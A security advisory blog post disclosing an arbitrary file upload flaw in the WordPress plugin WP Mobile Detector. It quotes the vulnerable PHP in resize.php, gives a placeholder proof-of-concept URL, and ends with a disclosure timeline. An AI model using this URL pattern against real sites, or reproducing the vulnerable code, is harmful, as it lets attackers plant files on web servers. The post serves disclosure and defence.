A few days ago we had a HEAD request for the file /blog/wp-content/plugins/wp-mobile-detector/resize.php, which is a file in the plugin WP Mobile Detector. Since we didn’t have that plugin installed that most likely explanation for that was someone was checking for the existence of the file before trying to exploit a vulnerability in the plugin. Looking around we couldn’t find any public information disclosure of vulnerability involving that particular file, but a quick look at the file showed that plugin has an arbitrary file upload vulnerability. The severity of the vulnerability is lessened by the fact that it requires the server to have an option enabled that introduces the potential for security risks like this.

The code in the file first checks if a file exists based on the GET or POST value “src”:

1
2
3
4

<?php
if (isset($_REQUEST['src'])) {
	$path = dirname(__FILE__) . "/cache/" . basename($_REQUEST['src']);
	if(file_exists($path)){

If the file doesn’t exist is created:

27
28

	}else{
		file_put_contents($path, file_get_contents($_REQUEST['src']));

The file_get_contents() function used to gets the file’s contents in that can use a URL as the filename if allow_url_fopen option is enabled. In that case a hacker could load up whatever file they want on to the website. Since having allow_url_fopen enabled can lead to this type of issue it looks like this is not enabled at many web host (you can check if that is enabled with the phpinfo() function.

Proof of Concept

Make sure to replace “[path to WordPress]” with the location of WordPress and “[URL of upload file]” with the URL of the file you are trying to upload.

http://[path to WordPress]/wp-content/plugins/wp-mobile-detector/resize.php?src=[URL of upload file]

Timeline

• 5/29/2016 – Notified developer.
• 5/31/2016 – Notified wordpress.org Plugin Directory.
• 5/31/2016 – Plugin removed from the Plugin Directory.
• 6/2/2016 – Version 3.6 released, which fixes vulnerabilities.

Concerned About The Security of the Plugins You Use?